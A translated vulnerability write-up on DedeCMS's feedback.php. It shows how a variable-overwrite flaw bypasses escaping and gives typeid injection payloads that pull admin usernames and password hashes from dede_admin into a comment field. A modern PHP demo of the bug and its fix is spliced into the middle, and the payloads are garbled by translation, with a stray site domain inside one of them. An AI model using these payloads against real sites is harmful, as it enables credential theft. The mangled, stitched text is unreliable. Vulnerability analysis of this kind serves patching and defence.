Analysis of recent dedecms Injection

Source: Internet
Author: User

Vulnerable file: plus/feedback.php

Problematic code:

...
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    if($msg != '')
    {   // the $typeid variable is never initialized
        $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg');";
        echo $inquery; // debug: print the query statement
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg('Posting comment error!', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
// quote and reply
elseif($comtype == 'reply')
{
    $row = $dsql->GetOne("SELECT * FROM `dede_feedback` WHERE id='$fid'");
    $arctitle = $row['arctitle'];
    $aid = $row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg, 2);
    $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
        VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}

The complete INSERT statement as executed; the second column, typeid, is attacker-controllable:

INSERT INTO `dede_feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) VALUES ('000000', '2', 'tourists', 'paxmac', '2017. 0.0.1', '1', '000000', '0', '0', '0', 'feedback', '0', 'nsfocus & paxmac team');


The common.inc.php file processes every request:

function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            if( strlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )
            {
                exit('Request var not allow!');
            }
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
...
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        if($_k == 'nvarname') ${$_k} = $_v;
        else ${$_k} = _RunMagicQuotes($_v);
    }
}
...

From the code above we can see that it escapes externally submitted data, but in filter.inc.php:

function _FilterAll($fk, &$svar)
{
    global $cfg_notallowstr, $cfg_replacestr;
    if(is_array($svar))
    {
        foreach($svar as $_k => $_v)
        {
            $svar[$_k] = _FilterAll($fk, $_v);
        }
    }
    else
    {
        if($cfg_notallowstr != '' && preg_match("#".$cfg_notallowstr."#i", $svar))
        {
            ShowMsg(" $fk has not allow words!", '-1');
            exit();
        }
        if($cfg_replacestr != '')
        {
            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);
        }
    }
    return $svar;
}

/* filter _GET, _POST, _COOKIE */
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v)
    {
        ${$_k} = _FilterAll($_k, $_v);
    }
}

The code above handles sensitive-word filtering, but it registers the request variables a second time, which produces a second variable-overwrite vulnerability. This problem has in fact existed for a long time: because only the keys of a one-dimensional array are checked on submitted variables, the check can be bypassed to create system configuration variables that should not be settable. Every fix dedecms has made here is confusing; all of them are superficial, and none of them removes the cause of the problem. Judging from the patch, only one line was added, checking whether $typeid is a number. The 80sec anti-injection code has thus been bypassed twice, and the root cause ignored.
So when magic_quotes_gpc is OFF, the escaped variables are overwritten again by the raw values and become ordinary, unescaped input.
E.g. the escaped typeid=2\' is overwritten back to typeid=2'
Anyone who studied the previous dedecms SQL injection problem will already understand its anti-injection mechanism, so only a brief analysis here: it trusts the quote character and does not check the content between \' and ', so you only need to place the code you want to use inside '' to evade the check. By a MySQL syntax quirk, the value of @''' is empty. The following constructs the exp for the vulnerability:
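To make the overwrite concrete, here is an added, self-contained PHP sketch (not dedecms code) that replays the two register-globals passes over a constructed request array with magic quotes off, then shows the fix a maintainer would actually want: filter the already-escaped copy instead of the raw request value, cast typeid to an integer, and bind parameters instead of interpolating them. The request array, the banned word, the stand-in function names and the three-column `dede_feedback` table are assumptions.

```php
<?php
// Added example (not dedecms code): replay the two registration passes.
// Constructed request, as if magic_quotes_gpc were OFF.
$_REQ = ['typeid' => "2'", 'msg' => 'hello'];

function runMagicQuotes($v) {            // stands in for _RunMagicQuotes
    return is_array($v) ? array_map('runMagicQuotes', $v) : addslashes($v);
}
function filterAll($k, $v) {             // stands in for _FilterAll
    $notallow = 'badword';               // assumed $cfg_notallowstr
    if (!is_array($v) && preg_match("#$notallow#i", $v)) { exit("$k has not allow words!"); }
    return $v;
}

// Pass 1 (common.inc.php): escape and register as globals.
$vars = [];
foreach ($_REQ as $k => $v) { $vars[$k] = runMagicQuotes($v); }
echo "after pass 1: typeid=" . $vars['typeid'] . "\n";             // 2\'

// Pass 2 (filter.inc.php), vulnerable: re-registers from the RAW request,
// so the escaped copy is clobbered by the unescaped value.
foreach ($_REQ as $k => $v) { $vars[$k] = filterAll($k, $v); }
echo "after pass 2 (vulnerable): typeid=" . $vars['typeid'] . "\n"; // 2'

// Fixed pass 2: run the word filter over the already-registered (escaped)
// copy, never over the raw request value, so nothing is overwritten.
$vars = [];
foreach ($_REQ as $k => $v) { $vars[$k] = runMagicQuotes($v); }
foreach ($_REQ as $k => $v) { $vars[$k] = filterAll($k, $vars[$k]); }
echo "after fixed pass 2: typeid=" . $vars['typeid'] . "\n";        // 2\'

// Defence in depth for the INSERT itself: typeid is a numeric column, so cast
// it before it reaches SQL (the one-line check the patch adds), and use a
// prepared statement so escaping state no longer decides whether SQL is safe.
$typeid = (int)$vars['typeid'];                                      // 2
$pdo = new PDO('sqlite::memory:');
$pdo->exec("CREATE TABLE dede_feedback (aid INT, typeid INT, msg TEXT)");
$st = $pdo->prepare("INSERT INTO dede_feedback (aid, typeid, msg) VALUES (?, ?, ?)");
$st->execute([1, $typeid, $vars['msg']]);
echo "rows: " . $pdo->query("SELECT count(*) FROM dede_feedback")->fetchColumn() . "\n";
```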
Typeid = 100', @ ''', 0 × 11111,1111, 123 172.1660, 0, 0, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM dedede_admin )), (108, '100
I submit this parameter with Tamper Data.

In fact, a small bug is also used here.

Looking at the table structure, only msg may be NULL, yet the statement puts NULL into username. On its own that INSERT is invalid and will not succeed; the following statement, however, is valid (insert (a,B) values () (,) is invalid). When the conditions are met, both rows are inserted at once. Because of the number of characters the page displays, the msg field is chosen as the output.
Supplement: in `aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`, aid is the ID of the article, so using my statement directly will not succeed; you need to change it to your own article ID.
Typeid = 100', @ ''', 0 × 11111,1111, 123 172.1660, 0, 0, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM 'dede _ admin'), (comment Article ID, '100

For example, if the message is submitted through Tamper Data (article id = 123), change msg to www.2cto.com

Mcbang & typeid = 0', '3', '4', '5', '0', '000000', % 20'0', '0 ', '0', '0', '0', 'aaaaa'), ('123', '2', @ ''', '4', '5 ', '1', '000000', % 20' 0', '0', '0', '0', '0', (SELECT concat (uname, 0x5f, pwd, 0x5f) from '@#__ admin'), (123, '2
